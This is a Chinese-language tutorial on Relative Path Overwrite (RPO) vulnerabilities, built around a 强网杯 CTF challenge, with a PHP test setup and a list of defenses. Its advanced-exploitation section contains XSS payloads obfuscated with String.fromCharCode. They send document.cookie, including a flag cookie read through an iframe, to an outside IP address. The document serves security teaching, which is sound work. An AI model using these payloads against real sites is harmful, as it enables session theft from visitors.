RPO漏洞深入分析与利用指南<\/h1>

一、RPO漏洞概述<\/h2>
RPO<\/strong> (Relative Path Overwrite)即相对路径覆盖漏洞，是一种利用浏览器和服务器对资源加载路径解析差异的安全漏洞。通过精心构造的URL，攻击者可以诱使浏览器将非JavaScript\/CSS文件当作脚本或样式表来解析执行。<\/p>

核心原理<\/h3>

服务端与客户端URL解析不一致<\/strong>：服务器和浏览器对URL中的路径和特殊字符(如%2f)处理方式不同<\/li>
相对路径资源加载<\/strong>：浏览器在解析相对路径引用的资源时，基于当前URL路径而非服务器实际返回的路径<\/li>
非JS\/CSS文件被当作脚本解析<\/strong>：攻击者可以诱导浏览器将普通HTML内容当作JavaScript代码执行<\/li> <\/ul>
二、漏洞利用条件<\/h2>

网站使用相对路径引用静态资源(JS\/CSS)<\/li>
服务器和浏览器对URL的解析存在差异<\/li>
攻击者能够控制部分页面内容<\/li>
目标页面能够返回纯文本内容(不含HTML标签)<\/li> <\/ol>
三、漏洞利用流程(以强网杯题目为例)<\/h2>
1. 漏洞发现<\/h3>

目标系统存在一个文章发布功能<\/li>
当文章标题为空时，返回纯文本内容<\/li>
系统使用相对路径引用jQuery等JS文件<\/li> <\/ul>
2. 攻击步骤<\/h3>
第一步：创建恶意内容<\/h4>

发布一篇无标题文章，内容为XSS payload：
alert(1) <\/code><\/pre> <\/li> <\/ol> 第二步：构造RPO攻击URL<\/h4> http:\/\/target.com\/index.php\/view\/article\/36967\/..%2f..%2f..%2f..%2findex.php <\/code><\/pre> 第三步：浏览器解析过程<\/h4> 服务器解析<\/strong>：<\/p> 解码%2f为\/<\/li> 实际访问路径：\/index.php\/view\/article\/36967\/index.php<\/code><\/li> 返回36967文章的内容(alert(1)<\/code>)<\/li> <\/ul> <\/li> 浏览器解析<\/strong>：<\/p> 不解码%2f，将..%2f..%2f..%2f..%2findex.php<\/code>视为无用参数<\/li> 当前URL被视为：\/index.php\/view\/article\/36967\/<\/code><\/li> 加载相对路径资源时，构造的URL变为： \/index.php\/view\/article\/36967\/..%2f..%2f..%2f..%2findex.php\/static\/js\/jquery.min.js <\/code><\/pre> <\/li> 服务器返回36967文章内容(alert(1)<\/code>)，被当作JS执行<\/li> <\/ul> <\/li> <\/ol> 3. 进阶利用<\/h3> 当存在过滤时，可使用String.fromCharCode绕过：<\/p> (new<\/span> Image<\/span>()).src<\/span> =<\/span> String.fromCharCode<\/span>(104<\/span>,116<\/span>,116<\/span>,112<\/span>,58<\/span>,47<\/span>,47<\/span>,53<\/span>,52<\/span>,46<\/span>,50<\/span>,51<\/span>,53<\/span>,46<\/span>,50<\/span>,51<\/span>,52<\/span>,46<\/span>,54<\/span>,56<\/span>,58<\/span>,50<\/span>,51<\/span>,51<\/span>,47<\/span>)+<\/span>document.cookie<\/span>; <\/span><\/span><\/code><\/pre>读取二级目录cookie：<\/p> var<\/span> iframe<\/span> =<\/span> document.createElement<\/span>(String.fromCharCode<\/span>(105<\/span>,102<\/span>,114<\/span>,97<\/span>,109<\/span>,101<\/span>)); <\/span><\/span>iframe<\/span>.src<\/span> =<\/span> String.fromCharCode<\/span>(47<\/span>,81<\/span>,87<\/span>,66<\/span>,95<\/span>,102<\/span>,108<\/span>,52<\/span>,103<\/span>,47<\/span>,81<\/span>,87<\/span>,66<\/span>,47<\/span>); <\/span><\/span>iframe<\/span>.id<\/span> =<\/span> String.fromCharCode<\/span>(102<\/span>,114<\/span>,97<\/span>,109<\/span>,101<\/span>); <\/span><\/span>document.body<\/span>.appendChild<\/span>(iframe<\/span>); <\/span><\/span>iframe<\/span>.onload<\/span> =<\/span> function<\/span> (){ <\/span><\/span> var<\/span> c<\/span> =<\/span> document.getElementById<\/span>(String.fromCharCode<\/span>(102<\/span>,114<\/span>,97<\/span>,109<\/span>,101<\/span>)).contentWindow<\/span>.document.cookie<\/span>; <\/span><\/span> var<\/span> n0t<\/span> =<\/span> document.createElement<\/span>(String.fromCharCode<\/span>(108<\/span>,105<\/span>,110<\/span>,107<\/span>)); <\/span><\/span> n0t<\/span>.setAttribute<\/span>(String.fromCharCode<\/span>(114<\/span>,101<\/span>,108<\/span>), String.fromCharCode<\/span>(112<\/span>,114<\/span>,101<\/span>,102<\/span>,101<\/span>,116<\/span>,99<\/span>,104<\/span>)); <\/span><\/span> n0t<\/span>.setAttribute<\/span>(String.fromCharCode<\/span>(104<\/span>,114<\/span>,101<\/span>,102<\/span>), String.fromCharCode<\/span>(47<\/span>,47<\/span>,53<\/span>,52<\/span>,46<\/span>,50<\/span>,51<\/span>,53<\/span>,46<\/span>,50<\/span>,51<\/span>,52<\/span>,46<\/span>,54<\/span>,56<\/span>,58<\/span>,50<\/span>,51<\/span>,51<\/span>,47<\/span>,63<\/span>,102<\/span>,108<\/span>,97<\/span>,103<\/span>,61<\/span>) +<\/span> c<\/span>); <\/span><\/span> document.head<\/span>.appendChild<\/span>(n0t<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre>四、测试环境搭建<\/h2> PHP测试代码<\/h3> <?<\/span>php<\/span> <\/span><\/span>$path=<\/span>'http:\/\/localhost\/hello\/'<\/span> <\/span><\/span>?><\/span> <\/span><\/span><\/span><a class="navbar-brand" href="<?php echo $path?>url.php">三国杀<\/a> <\/span><\/span><\/span><li class="active" id='wei'><a href="<?php echo $path?>url.php\/country\/wei">魏<\/a><\/li> <\/span><\/span><\/span><li id ='shu'><a href="<?php echo $path?>url.php\/country\/shu">蜀<\/a><\/li> <\/span><\/span><\/span><li class="active" id='wu'><a href="<?php echo $path?>url.php\/country\/wu">吴<\/a><\/li> <\/span><\/span><\/span><link rel="stylesheet" href=".\/style.css" style="css" \/> <\/span><\/span><\/span> <\/span><\/span><\/span><?php <\/span><\/span><\/span>$arr=isset($_SERVER['PATH_INFO'])?explode('\/',trim($_SERVER['PATH_INFO'])):null; <\/span><\/span><\/span>$value=''; <\/span><\/span><\/span>for($_=0;$_<count($arr);$_+=2){ <\/span><\/span><\/span> $value[$arr[$_]]=$arr[$_+1]; <\/span><\/span><\/span>} <\/span><\/span><\/span>$value['country']=isset($value['country'])?$value['country']:null; <\/span><\/span><\/span>switch ($value['country']) { <\/span><\/span><\/span> case 'wei': ?> <\/span><\/span><\/span> <h1>welcome to 魏国!<\/h1> <\/span><\/span><\/span> <?php break; <\/span><\/span><\/span> case 'shu': ?> <\/span><\/span><\/span> <h1>welcome to 蜀国!<\/h1> <\/span><\/span><\/span> <?php break; <\/span><\/span><\/span> case 'wu': ?> <\/span><\/span><\/span> <h1>welcome to 吴国!<\/h1> <\/span><\/span><\/span> <?php break; <\/span><\/span><\/span> default: ?> <\/span><\/span><\/span> <h1>welcome!<\/h1> <\/span><\/span><\/span> <?php break; <\/span><\/span><\/span>} <\/span><\/span><\/span>?> <\/span><\/span><\/span><\/code><\/pre>style.css文件<\/h3> h1<\/span> { <\/span><\/span> font-size<\/span>:180<\/span>px<\/span>; <\/span><\/span> color<\/span>:blue<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>五、防御措施<\/h2> 使用绝对路径引用静态资源<\/strong>：避免使用相对路径<\/li> 统一URL解析规则<\/strong>：确保服务器和客户端对URL的解析一致<\/li> 内容安全策略(CSP)<\/strong>：限制脚本来源<\/li> 禁用路径遍历<\/strong>：过滤..\/<\/code>等路径遍历字符<\/li> 严格区分内容类型<\/strong>：确保JS\/CSS文件有正确的MIME类型<\/li> <\/ol> 六、相关资源<\/h2> 34C3 CTF URLStorage题目<\/a><\/li> Pwnhub "大物必须过"题目<\/a><\/li> 绿盟RPO相关文章<\/a><\/li> <\/ol> 通过深入理解RPO漏洞的原理和利用方式，安全研究人员可以更好地发现和防御此类漏洞，提高Web应用的安全性。<\/p>